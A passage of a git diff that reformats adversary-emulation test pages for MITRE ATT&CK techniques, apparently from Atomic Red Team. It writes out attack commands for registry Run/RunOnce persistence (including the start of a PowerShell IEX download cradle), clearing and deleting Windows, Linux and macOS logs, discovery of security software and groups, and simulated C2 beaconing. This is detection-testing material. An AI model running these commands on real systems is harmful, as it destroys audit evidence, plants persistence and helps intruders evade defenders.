NT\CurrentVersion\Winlogon\Userinit and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch programs. +The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions +are under the control of the operating system, but you can also add custom actions here. The +HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and +HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys can automatically launch +programs. -Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user logs on. +Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows +NT\CurrentVersion\Windows run when any user logs on. -By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot. +By default, the multistring BootExecute value of the registry key +HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value +causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down +abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at +boot. - -Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
+Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain +persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) +to make the Registry entries look as if they are associated with legitimate programs. ## Atomic Tests @@ -43,97 +63,83 @@ Adversaries can use these configuration locations to execute malware, such as re - [Atomic Test #3 - PowerShell Registry RunOnce](#atomic-test-3---powershell-registry-runonce) -
## Atomic Test #1 - Reg Key Run + Run Key Persistence -Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout. +Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be +via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" ``` #### Cleanup Commands: + ```cmd REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1 ``` - - - -

## Atomic Test #2 - Reg Key RunOnce + RunOnce Key Persistence. -Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout. +Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via +stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" ``` #### Cleanup Commands: + ```cmd REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1 ``` - - - -

## Atomic Test #3 - PowerShell Registry RunOnce + RunOnce Key Persistence via PowerShell Upon successful execution, a new entry will be added to the runonce item in the registry. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | powershell.exe| | reg_key_path | Path to registry key to update | Path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $RunOnceKey = "#{reg_key_path}" @@ -141,12 +147,9 @@ set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net ``` #### Cleanup Commands: + ```powershell Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1062.md b/Atomic_Threat_Coverage/Triggers/T1062.md index 009d60be..3eaf905c 100644 --- a/Atomic_Threat_Coverage/Triggers/T1062.md +++ b/Atomic_Threat_Coverage/Triggers/T1062.md @@ -1,36 +1,35 @@ # T1062 - Hypervisor + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1062) +
A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.
## Atomic Tests - [Atomic Test #1 - Installing Hyper-V Feature](#atomic-test-1---installing-hyper-v-feature) -
## Atomic Test #1 - Installing Hyper-V Feature + PowerShell command to check if Hyper-v is installed. Install Hyper-V feature. Create a New-VM -Upon successful execution, powershell will check if Hyper-V is installed, if not, install it and create a base vm. Output will be via stdout. +Upon successful execution, powershell will check if Hyper-V is installed, if not, install it and create a base vm. +Output will be via stdout. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | hostname | Host to query to see if Hyper-V feature is installed. | string | test-vm| | vm_name | Create a new VM. | string | testvm| | file_location | Location of new VHDX file | string | C:\Temp\test.vhdx| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname} @@ -38,9 +37,4 @@ Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagemen New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480 ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1063.md b/Atomic_Threat_Coverage/Triggers/T1063.md index 852b8c3a..0ffde956 100644 --- a/Atomic_Threat_Coverage/Triggers/T1063.md +++ b/Atomic_Threat_Coverage/Triggers/T1063.md @@ -1,11 +1,17 @@ # T1063 - Security Software Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1063) -
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. +
Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ### Windows -Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. +Example commands that can be used to obtain security software information +are [netsh](https://attack.mitre.org/software/S0108), reg query +with [Reg](https://attack.mitre.org/software/S0075), dir +with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other +indicators of discovery behavior may be more specific to the type of software or security system the adversary is +looking for. ### Mac @@ -23,10 +29,10 @@ It's becoming more common to see macOS malware perform checks for LittleSnitch a - [Atomic Test #5 - Security Software Discovery - AV Discovery via WMI](#atomic-test-5---security-software-discovery---av-discovery-via-wmi) -
## Atomic Test #1 - Security Software Discovery + Methods to identify Security Software on an endpoint when sucessfully executed, the test is going to display running processes, firewall configuration on network profiles @@ -34,12 +40,7 @@ and specific security software. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd netsh.exe advfirewall show allprofiles @@ -50,27 +51,18 @@ tasklist.exe | findstr /i defender tasklist.exe | findstr /i cylance ``` - - - - -

## Atomic Test #2 - Security Software Discovery - powershell + Methods to identify Security Software on an endpoint when sucessfully executed, powershell is going to processes related AV products if they are running. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell get-process | ?{$_.Description -like "*virus*"} @@ -79,87 +71,55 @@ get-process | ?{$_.Description -like "*defender*"} get-process | ?{$_.Description -like "*cylance*"} ``` - - - - -

## Atomic Test #3 - Security Software Discovery - ps + Methods to identify Security Software on an endpoint -when sucessfully executed, command shell is going to display AV software it is running( Little snitch or carbon black ). +when sucessfully executed, command shell is going to display AV software it is running( Little snitch or carbon black ). **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh ps -ef | grep Little\ Snitch | grep -v grep ps aux | grep CbOsxSensorService ``` - - - - -

## Atomic Test #4 - Security Software Discovery - Sysmon Service + Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed). when sucessfully executed, the test is going to display sysmon driver instance if it is installed. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd fltmc.exe | findstr.exe 385201 ``` - - - - -

## Atomic Test #5 - Security Software Discovery - AV Discovery via WMI + Discovery of installed antivirus products via a WMI query. when sucessfully executed, the test is going to display installed AV software. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1064.md b/Atomic_Threat_Coverage/Triggers/T1064.md index 06dacd61..d7357d18 100644 --- a/Atomic_Threat_Coverage/Triggers/T1064.md +++ b/Atomic_Threat_Coverage/Triggers/T1064.md @@ -1,10 +1,19 @@ # T1064 - Scripting + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1064) +
Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts. -Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them. +Scripts can be embedded inside Office documents as macros that can be set to execute when files used +in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. +Malicious embedded macros are an alternative means of execution than software exploitation +through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on +macros being allowed or that the user will accept to activate them. -Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)
+Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. +Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three +examples that are popular among penetration testers for exploit and post-compromise operations and include many features +for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)
## Atomic Tests @@ -12,20 +21,15 @@ Many popular offensive frameworks exist which use forms of scripting for securit - [Atomic Test #2 - Create and Execute Batch Script](#atomic-test-2---create-and-execute-batch-script) -
## Atomic Test #1 - Create and Execute Bash Shell Script + Creates and executes a simple bash script. **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" @@ -34,56 +38,50 @@ chmod +x /tmp/art.sh sh /tmp/art.sh ``` - - - - -

## Atomic Test #2 - Create and Execute Batch Script -Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again. - -**Supported Platforms:** Windows - +Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close +again. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Command to execute within script. | string | dir| | script_path | Path of script to create. | path | $env:TEMP\T1064_script.bat| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Start-Process #{script_path} ``` #### Cleanup Commands: + ```powershell Remove-Item #{script_path} -Force -ErrorAction Ignore ``` - - #### Dependencies: Run with `powershell`! + ##### Description: Batch file must exist on disk at specified location (#{script_path}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{script_path}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1065.md b/Atomic_Threat_Coverage/Triggers/T1065.md index fe1a98f9..2ff169a0 100644 --- a/Atomic_Threat_Coverage/Triggers/T1065.md +++ b/Atomic_Threat_Coverage/Triggers/T1065.md @@ -1,5 +1,7 @@ # T1065 - Uncommonly Used Port + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1065) +
Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.
## Atomic Tests @@ -8,65 +10,49 @@ - [Atomic Test #2 - Testing usage of uncommonly used port](#atomic-test-2---testing-usage-of-uncommonly-used-port) -
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell -Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon exectuion, details about the successful + +Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon +exectuion, details about the successful port check will be displayed. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Test-NetConnection -ComputerName #{domain} -port #{port} ``` - - - - -

## Atomic Test #2 - Testing usage of uncommonly used port + Testing uncommonly used port utilizing telnet. **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh telnet #{domain} #{port} ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1069.md b/Atomic_Threat_Coverage/Triggers/T1069.md index 5761eab7..b28e9f89 100644 --- a/Atomic_Threat_Coverage/Triggers/T1069.md +++ b/Atomic_Threat_Coverage/Triggers/T1069.md @@ -1,24 +1,33 @@ # T1069 - Permission Groups Discovery + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1069) +
Adversaries may attempt to find local system or domain-level groups and permissions settings. ### Windows -Examples of commands that can list groups are net group /domain and net localgroup using the [Net](https://attack.mitre.org/software/S0039) utility. +Examples of commands that can list groups are net group /domain and net localgroup using +the [Net](https://attack.mitre.org/software/S0039) utility. ### Mac -On Mac, this same thing can be accomplished with the dscacheutil -q group for the domain, or dscl . -list /Groups for local groups. +On Mac, this same thing can be accomplished with the dscacheutil -q group for the domain, or dscl . +-list /Groups for local groups. ### Linux -On Linux, local groups can be enumerated with the groups command and domain groups via the ldapsearch command. +On Linux, local groups can be enumerated with the groups command and domain groups via the +ldapsearch command. ### Office 365 and Azure AD -With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft msrole)(Citation: GitHub Raindance) +With authenticated access there are several tools that can be used to find permissions groups. The +Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 +accounts.(Citation: Microsoft msrole)(Citation: GitHub Raindance) -Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command az ad user get-member-groups will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)
+Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The +command az ad user get-member-groups will list groups associated to a user account.(Citation: Microsoft AZ +CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)
## Atomic Tests @@ -30,20 +39,15 @@ Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with - [Atomic Test #4 - Elevated group enumeration using net group](#atomic-test-4---elevated-group-enumeration-using-net-group) -
## Atomic Test #1 - Permission Groups Discovery + Permission Groups Discovery **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh dscacheutil -q group @@ -51,26 +55,18 @@ dscl . -list /Groups groups ``` - - - - -

## Atomic Test #2 - Basic Permission Groups Discovery Windows -Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain + +Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to +a domain. Upon execution, domain information will be displayed. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd net localgroup @@ -78,57 +74,43 @@ net group /domain net group "domain admins" /domain ``` - - - - -

## Atomic Test #3 - Permission Groups Discovery PowerShell -Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain + +Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected +to a domain. Upon execution, domain information will be displayed. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | user | User to identify what groups a user is a member of | string | administrator| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell get-localgroup get-ADPrincipalGroupMembership #{user} | select name ``` - - - - -

## Atomic Test #4 - Elevated group enumeration using net group -Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This -test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed. - -**Supported Platforms:** Windows - - - +Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value +domain groups. This +test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be +displayed. -#### Attack Commands: Run with `command_prompt`! +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! ```cmd net group /domai "Domain Admins" @@ -137,9 +119,4 @@ net groups "Exchange Organization Management" /doma net group "BUILTIN\Backup Operators" /doma ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1070.md b/Atomic_Threat_Coverage/Triggers/T1070.md index e436fef2..a671ca07 100644 --- a/Atomic_Threat_Coverage/Triggers/T1070.md +++ b/Atomic_Threat_Coverage/Triggers/T1070.md @@ -1,14 +1,21 @@ # T1070 - Indicator Removal on Host + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1070) +
Adversaries may delete or alter generated artifacts on a host system, including logs and potentially captured files such as quarantined malware. Locations and format of logs will vary, but typical organic system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/* . -Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred. +Actions that interfere with eventing and other notifications that can be used to detect intrusion activity may +compromise the integrity of security solutions, causing events to go unreported. They may also make forensic analysis +and incident response more difficult due to lack of sufficient data to determine what occurred. ### Clear Windows Event Logs -Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three system-defined sources of Events: System, Application, and Security. - -Adversaries performing actions related to account management, account logon and directory service access, etc. may choose to clear the events in order to hide their activities. +Windows event logs are a record of a computer's alerts and notifications. Microsoft defines an event as "any significant +occurrence in the system or in a program that requires users to be notified or an entry added to a log." There are three +system-defined sources of Events: System, Application, and Security. + +Adversaries performing actions related to account management, account logon and directory service access, etc. may +choose to clear the events in order to hide their activities. The event logs can be cleared with the following utility commands: @@ -16,7 +23,8 @@ The event logs can be cleared with the following utility commands: * wevtutil cl application * wevtutil cl security -Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086).
+Logs may also be cleared through other mechanisms, such as [PowerShell](https://attack.mitre.org/techniques/T1086) +. ## Atomic Tests @@ -34,163 +42,124 @@ Logs may also be cleared through other mechanisms, such as [PowerShell](https:// - [Atomic Test #7 - Delete System Logs Using Clear-EventLogId](#atomic-test-7---delete-system-logs-using-clear-eventlogid) -
## Atomic Test #1 - Clear Logs -Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. - -**Supported Platforms:** Windows - +Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and +verify that it is now empty. +**Supported Platforms:** Windows #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | log_name | Windows Log Name, ex System | String | System| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd wevtutil cl #{log_name} ``` - - - - -

## Atomic Test #2 - FSUtil -Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. Upon exectuion, no output -will be displayed. More information about fsutil can be found at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn - -**Supported Platforms:** Windows - - - +Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on +the volume. Upon exectuion, no output +will be displayed. More information about fsutil can be found +at https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +**Supported Platforms:** Windows +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd fsutil usn deletejournal /D C: ``` #### Cleanup Commands: + ```cmd fsutil usn createjournal m=1000 a=100 c: ``` - - - -

## Atomic Test #3 - rm -rf + Delete system and audit logs **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh rm -rf /private/var/log/system.log* rm -rf /private/var/audit/* ``` - - - - -

## Atomic Test #4 - Overwrite Linux Mail Spool -This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - -**Supported Platforms:** Linux - +This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the +exploitation of Linux web servers. +**Supported Platforms:** Linux #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of mail spool | String | root| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash echo 0> /var/spool/mail/#{username} ``` - - - - -

## Atomic Test #5 - Overwrite Linux Log -This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - -**Supported Platforms:** Linux - +This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux +web servers. +**Supported Platforms:** Linux #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | log_path | Path of specified log | Path | /var/log/secure| - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash echo 0> #{log_path} ``` - - - - -

## Atomic Test #6 - Delete System Logs Using PowerShell + Recommended Detection: Monitor for use of the windows event log filepath in PowerShell couple with delete arguments. -Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. +Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has +very few logs in it. When this service get's stopped, it is automatically restarted and the Security.evtx folder re-created. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $eventLogId = Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'EventLog'" | Select-Object -ExpandProperty ProcessId @@ -199,37 +168,26 @@ Remove-Item C:\Windows\System32\winevt\Logs\Security.evtx ``` #### Cleanup Commands: + ```powershell Start-Service -Name EventLog ``` - - - -

## Atomic Test #7 - Delete System Logs Using Clear-EventLogId + Clear event logs using built-in PowerShell commands. -Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it. +Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has +very few logs in it. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell Clear-EventLog -logname Application ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1071.md b/Atomic_Threat_Coverage/Triggers/T1071.md index d11484d6..bc3e9de9 100644 --- a/Atomic_Threat_Coverage/Triggers/T1071.md +++ b/Atomic_Threat_Coverage/Triggers/T1071.md @@ -1,8 +1,11 @@ # T1071 - Standard Application Layer Protocol + ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1071) +
Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. -For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.
+For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), +commonly used protocols are RPC, SSH, or RDP. ## Atomic Tests @@ -22,26 +25,23 @@ For connections that occur internally within an enclave (such as those between a - [Atomic Test #8 - OSTap Payload Download](#atomic-test-8---ostap-payload-download) -
## Atomic Test #1 - Malicious User Agents - Powershell + This test simulates an infected host beaconing to command and control. -Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat +Inspired by APTSimulator +- https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null @@ -50,31 +50,24 @@ Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | ou Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null ``` - - - - -

## Atomic Test #2 - Malicious User Agents - CMD + This test simulates an infected host beaconing to command and control. -Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat +Inspired by APTSimulator +- https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd curl -s -A "HttpBrowser/1.0" -m3 #{domain} @@ -83,31 +76,24 @@ curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} curl -s -A "*<|>*" -m3 #{domain} ``` - - - - -

## Atomic Test #3 - Malicious User Agents - Nix + This test simulates an infected host beaconing to command and control. -Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat +Inspired by APTSimulator +- https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat **Supported Platforms:** Linux, macOS - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Default domain to simulate against | string | www.google.com| - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh curl -s -A "HttpBrowser/1.0" -m3 #{domain} @@ -116,24 +102,19 @@ curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} curl -s -A "*<|>*" -m3 #{domain} ``` - - - - -

